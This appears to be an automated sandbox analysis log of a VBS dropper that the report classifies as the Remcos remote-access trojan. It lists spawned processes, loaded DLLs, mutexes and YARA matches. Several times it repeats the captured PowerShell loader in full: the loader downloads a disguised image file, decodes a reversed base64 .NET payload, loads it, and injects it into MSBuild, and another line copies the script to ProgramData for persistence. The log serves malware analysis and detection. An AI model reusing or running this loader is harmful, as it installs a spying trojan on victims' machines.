                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004158B9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041D07112_2_0041D071
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004520D212_2_004520D2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043D09812_2_0043D098
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043715012_2_00437150
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004361AA12_2_004361AA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0042625412_2_00426254
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043137712_2_00431377
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043651C12_2_0043651C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041E5DF12_2_0041E5DF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0044C73912_2_0044C739
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004367C612_2_004367C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004267CB12_2_004267CB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043C9DD12_2_0043C9DD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00432A4912_2_00432A49
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00436A8D12_2_00436A8D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043CC0C12_2_0043CC0C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00436D4812_2_00436D48
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00434D2212_2_00434D22
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00426E7312_2_00426E73
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00440E2012_2_00440E20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043CE3B12_2_0043CE3B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00412F4512_2_00412F45
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00452F0012_2_00452F00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00426FAD12_2_00426FAD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00401F66 appears 50 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004020E7 appears 40 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004338A5 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00433FB0 appears 55 times
                        Source: LbtytfWpvx.vbsInitial sample: Strings found which are bigger than 50
                        Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: Process Memory Space: powershell.exe PID: 7320, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: MSBuild.exe PID: 8048, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@21/10@7/3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00416AB7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040E219
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041A63F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BC4
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\VBScriptingJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Rmcghdzxtrswtwg-BJ2KPV
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1hmz0p4.qq3.ps1Jump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs"
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\talpe.vbs"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe C:\ProgramData\talpe.vbs
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\talpe.vbs"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs" Jump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
